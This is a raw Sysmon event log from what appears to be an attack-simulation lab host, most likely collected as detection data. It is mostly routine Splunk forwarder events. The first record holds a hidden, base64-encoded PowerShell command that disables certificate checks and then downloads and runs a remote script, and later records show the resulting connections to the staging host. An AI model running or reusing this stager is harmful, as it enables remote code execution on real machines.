[System.Environment]::UserNameC:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACQATQBTAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQAwAC4AMAAuADEALgAxADYALwBiAGgALwBzAHkAbgBjAC8AYQBvAGwALwBfAHIAcAAnACkAKQApADsASQBFAFgAIAAkAE0AUwA= 23542300x800000000000000036498182Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.439{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36A22D2344815369EC774D407F26C6E5,SHA256=2F4A44EEE679D61A92B74C5C30C050C6D081085E72D6AF4E34E50364EAB180FB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498213Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:03.827{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8359D885815F872A0C94E9EE4240CB55,SHA256=C1DAC4CADF4EDF7DC4091F8C928644F760074578E579A21F3BDDB58A693838C0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498212Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:03.827{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B65FBA0EFC1CB423383A24A75D023ECE,SHA256=45BA36FD420A83F865E8DB03515D73D1C9E880FD27C431B31FC7C0F509FF0FA1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498211Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:03.826{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26A065C2E7AD022C08A19A8202CAD26B,SHA256=E7DED73D5305F3FB7CFEEBAC3C2BB59D86BF25F62ED3F7402A37D6BD81B93EC4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498210Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:03.826{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=026C1B664A94066E155A9EF8CED17C4A,SHA256=8A7F0F0B62A9C4086FC068A10F72D5D6EC7AD883A0665D9213CE332E48BA9B43,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498215Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:04.908{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3295757FE9CD86E8A57F4897374D18BD,SHA256=697994C95956A5D31B8268980C11CCE8DDAF56FA3B40251F4FADCE29032BF5E9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498214Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:34.243{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50623-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498217Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:05.924{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99976A44A7E24AE14F3BE93E1E754163,SHA256=F1F0482C45033208F5BEDD96D8AE40820A34A5751A8086528FE87DE8C10E81F6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498216Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:34.611{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50624-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498218Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:06.959{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01B7A51772F2FD0A6D3D2B7EE5C4670F,SHA256=29BAB8F4EDFF81662DE54D8920D0F30568C76473A22AF33806CBC96ED301DFA3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498227Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:07.973{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E37BF4DB2AAD9A0D5EBE11C64C8DF7CD,SHA256=3FE6A6A1D3060E8C90633316FC835C2C276965C2F448791C893B1E05A0EE4402,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498226Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:07.957{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A1C3-6140-A356-04000000C801}4440C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498225Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:07.957{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498224Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:07.957{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498223Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:07.957{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498222Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:07.957{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498221Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:07.957{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-A1C3-6140-A356-04000000C801}4440C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498220Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:07.957{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A1C3-6140-A356-04000000C801}4440C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498219Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:07.942{B81B27B7-A1C3-6140-A356-04000000C801}4440C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036498239Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:08.957{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AA1D351930A3BCAE98DEDF5A21EA0E98,SHA256=2F87189E9D229A95BB38E85812510766CA40D8BBB76552763B523B82D9DF748E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498238Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:08.957{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8359D885815F872A0C94E9EE4240CB55,SHA256=C1DAC4CADF4EDF7DC4091F8C928644F760074578E579A21F3BDDB58A693838C0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498237Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:08.657{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A1C4-6140-A456-04000000C801}1400C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498236Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:08.657{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498235Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:08.657{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498234Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:08.657{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498233Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:08.657{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498232Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:08.657{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A1C4-6140-A456-04000000C801}1400C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498231Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:08.657{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A1C4-6140-A456-04000000C801}1400C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498230Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:08.642{B81B27B7-A1C4-6140-A456-04000000C801}1400C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000036498229Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:37.731{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50625-false10.0.1.12-8000- 10341000x800000000000000036498228Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:08.126{B81B27B7-A1C3-6140-A356-04000000C801}4440704C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036498241Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:09.971{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=1AB79CC2A4970D15D0F123EDCFBB7D2F,SHA256=E06A3BEEB76711B7A0617EA1F2D5B082E57F620FED1D6696F427D7C148CA3EAD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498240Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:09.025{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=005E154F400FE34A595C52F6F9C4325D,SHA256=6C88569547F15FCEDE2FBE97E828FB4E87D1A3434FCB6B5DA2D907DDE5D31F7C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498243Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:40.630{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50626-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498242Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:10.040{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2EF0B1D4AB541460F83973C8753AFB83,SHA256=17EA35FC4581FAC11DC33EEC8AF8F8ECA9E3786E47119CDD409CC3A774B22ABA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498244Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 